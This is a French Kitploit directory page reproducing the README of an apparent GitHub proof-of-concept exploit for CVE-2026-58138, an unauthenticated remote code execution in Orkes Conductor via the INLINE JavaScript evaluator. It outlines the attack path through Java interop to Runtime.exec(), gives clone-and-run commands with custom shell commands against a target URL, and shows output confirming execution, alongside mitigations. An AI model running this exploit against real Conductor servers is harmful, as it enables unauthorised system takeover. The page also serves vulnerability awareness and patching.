Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-58138 — CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE non authentifié via l'évaluateur GraalVM INLINE | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2026-58138
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHub0xgh057r3c0n/cve-2026-58138

CVE-2026-58138

CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE non authentifié via l'évaluateur GraalVM INLINE

Voir le dépôt
3il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) Exécution de code à distance non authentifiée

Orkes Conductor

Vulnérabilité critique d'exécution de code à distance dans Orkes Conductor

CVE Exploit Python


📋 Aperçu

CVE-2026-58138 est une vulnérabilité critique d'exécution de code à distance (RCE) non authentifiée affectant Orkes Conductor versions 3.21.21 à 3.30.1. Cette vulnérabilité permet à un attaquant d'exécuter des commandes arbitraires sur le serveur Conductor sans nécessiter d'authentification, pouvant conduire à une compromission complète du système.

🔴 Sévérité

  • Score CVSS : 9.8 (Critique)
  • Vecteur d'attaque : Réseau
  • Authentification : Aucune requise
  • Impact : Compromission totale du système

⚙️ Détails de la vulnérabilité

La vulnérabilité existe dans le type de tâche INLINE du moteur de workflows d'Orkes Conductor. La tâche INLINE prend en charge l'évaluation JavaScript avec accès aux objets Java via eval, permettant à un attaquant de :

  1. Enregistrer un workflow malveillant contenant une tâche INLINE avec du code JavaScript
  2. Exécuter du code Java arbitraire via l'interopérabilité Java de JavaScript
  3. Exécuter des commandes système sur le serveur Conductor via java.lang.Runtime.exec()

📦 Versions affectées

Plage de versionsStatut
3.21.21 - 3.30.1✅ Vulnérable
> 3.30.1❌ Corrigé

🚀 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138

# Make the script executable
chmod +x CVE-2026-58138.py

# Verify installation
python3 CVE-2026-58138.py --help

💘 Utilisation

root@kitploit:~
# Basic usage
python3 CVE-2026-58138.py http://target:8080

# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"

📊 Exemple de sortie

root@kitploit:~
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC

[*] target  = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12

🛡️ Atténuation

  1. Mettez à niveau vers Orkes Conductor 3.30.2 ou ultérieur
  2. Désactivez le type de tâche INLINE s'il n'est pas nécessaire
  3. Restreignez l'accès réseau à l'API Conductor

⚠️ Avertissement

À des fins éducatives et de recherche en sécurité uniquement. Utilisez uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test.


📚 Références

  • NVD - CVE-2026-58138
  • Sécurité d'Orkes Conductor

⭐ Vous avez trouvé cela utile ? Donnez-lui une étoile sur GitHub ⭐

GitHub stars

Télécharger l’outil